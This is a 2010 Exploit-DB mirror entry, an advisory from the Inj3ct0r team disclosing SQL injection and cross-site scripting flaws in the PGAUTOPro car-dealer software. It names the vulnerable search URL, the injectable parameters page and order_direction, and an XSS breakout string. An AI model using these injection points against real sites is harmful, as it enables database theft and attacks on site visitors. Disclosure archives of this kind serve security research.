bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/13786.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

65 lines
No EOL
3.8 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

        =======================================
          PGAUTOPro SQLi and XSS Vulnerability
        =======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : PGAUTOPro SQLi and XSS Vulnerability
Date : june, 9 2010
Vendor url :http://www.pgautopro.com/
Platform: Linux,Windows
Price: AUD$450
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members.
###############################################################################################################
Description:
Full Featured Car Dealer Inventory Software - PG Auto Pro
Our Software Solution will meet the requirements of Private Auto Dealers, Auto Dealership Companies and other Enterprises selling Vehicles.
The Software fundamental features will help starting your own Auto Classifieds Website:
- huge vehicles database with 3000 Models approximately
- possibility to add any new car that's missing in the database
- a powerful option of monetizing auto website - charging users for paid packages and additional services, selling banner places to
advertisirs, placing your own AdSense contextual ads will let you derive profit from the site
- a good chance for Car Dealers to sell their autos faster than before due to the comprehensive search options on the site.
###############################################################################################################
Xploit: SQLi Vulnerability
DEMO  
URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl
e%2Fbuy_do_search&page=[SQLi]
###############################################################################################################
Xploit: XSS Vulnerability
  Attack Pattern: '"-->
  http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
###############################################################################################################
# 0day no more
# Sid3^effects
Reference in a new issue View git blame Copy permalink